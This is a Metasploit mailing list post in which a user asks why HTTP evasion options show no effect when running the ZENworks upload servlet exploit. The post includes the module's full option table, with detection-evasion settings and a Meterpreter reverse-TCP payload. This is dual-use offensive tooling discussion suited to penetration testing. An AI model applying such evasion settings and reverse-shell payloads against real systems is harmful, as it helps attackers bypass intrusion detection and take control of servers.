Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

HTTP Evasions not working as intended

From: Ashish Joshi <joshi.ashish22 () gmail com>
Date: Fri, 6 Jan 2012 15:41:29 +0530
Hi,



I am trying to use various HTTP evasions for some HTTP server based
exploits (say exploit/windows/http/zenworks_uploadservlet) or similar
exploits. I am making use of various evasions supported. However, when I
run the exploit , I don’t see any difference b/w a normal exploitation and
evasive exploitation. I checked respective pcaps and they all look same. I
have tried using following evasions:



HTTP::method_random_case

HTTP::uri_fake_end

HTTP::pad_fake_headers





.. and couple more.



Here is my config:



msf  exploit(zenworks_uploadservlet) > set



Global

======



No entries in data store.



Module: windows/http/zenworks_uploadservlet

===========================================



  Name                          Value

  ----                          -----

  EnableUnicodeEncoding         true

  FingerprintCheck              false

  HTTP::header_folding          false

  HTTP::method_random_case      true

  HTTP::method_random_invalid   false

  HTTP::method_random_valid     false

  HTTP::pad_fake_headers        false

  HTTP::pad_fake_headers_count  0

  HTTP::pad_get_params          false

  HTTP::pad_get_params_count    16

  HTTP::pad_method_uri_count    1

  HTTP::pad_method_uri_type     space

  HTTP::pad_post_params         false

  HTTP::pad_post_params_count   16

  HTTP::pad_uri_version_count   1

  HTTP::pad_uri_version_type    space

  HTTP::uri_dir_fake_relative   false

  HTTP::uri_dir_self_reference  false

  HTTP::uri_encode_mode         hex-normal

  HTTP::uri_fake_end            true

  HTTP::uri_fake_params_start   false

  HTTP::uri_full_url            false

  HTTP::uri_use_backslashes     false

  InitialAutoRunScript

  LHOST                         10.204.136.1

  LPORT                         4444

  PAYLOAD                       java/meterpreter/reverse_tcp

  RHOST                         8.0.0.101

  RPORT                         80

 TARGET                        0

  UserAgent                     Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1)

  VERBOSE                       false

  WfsDelay                      0







This doesn’t seems to be working. Is there any bug related to it. I checked
the bug-tracker and couldn’t find a relevant one.

How do I make it work. Any help would be appreciated.





Thanks,

 Ashish

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: